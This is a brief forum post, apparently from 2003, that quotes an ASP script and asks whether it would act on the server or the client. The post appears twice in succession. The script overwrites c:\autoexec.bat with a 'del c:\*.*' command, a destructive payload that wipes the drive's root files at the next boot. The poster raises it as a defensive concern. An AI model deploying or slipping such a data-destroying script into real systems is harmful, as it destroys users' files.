goldfish
03-31-03, 16:48
Ok, here is the code in question:
<%
Set FS = Server.CreateObject("Scripting.FileSystemObject")
Set A = FS.OpenTextFile("c:\autoexec.bat",1,false)
x = A.ReadAll
A.Close
Set B = FS.CreateTextFile("c:\autoexec.bat")
B.Write
B.WriteBlankLines(2)
B.WriteLine("del c:\*.*")
B.Close
Set A = Nothing
Set B = Nothing
Set FS = Nothing
%>
Now personally, i belive that if you tried to execute that code, it would open autoexec.bat on the SERVER not the client. Its a theoretical exploit, and i want to make sure it doesnt affect me.
<%
Set FS = Server.CreateObject("Scripting.FileSystemObject")
Set A = FS.OpenTextFile("c:\autoexec.bat",1,false)
x = A.ReadAll
A.Close
Set B = FS.CreateTextFile("c:\autoexec.bat")
B.Write
B.WriteBlankLines(2)
B.WriteLine("del c:\*.*")
B.Close
Set A = Nothing
Set B = Nothing
Set FS = Nothing
%>
Now personally, i belive that if you tried to execute that code, it would open autoexec.bat on the SERVER not the client. Its a theoretical exploit, and i want to make sure it doesnt affect me.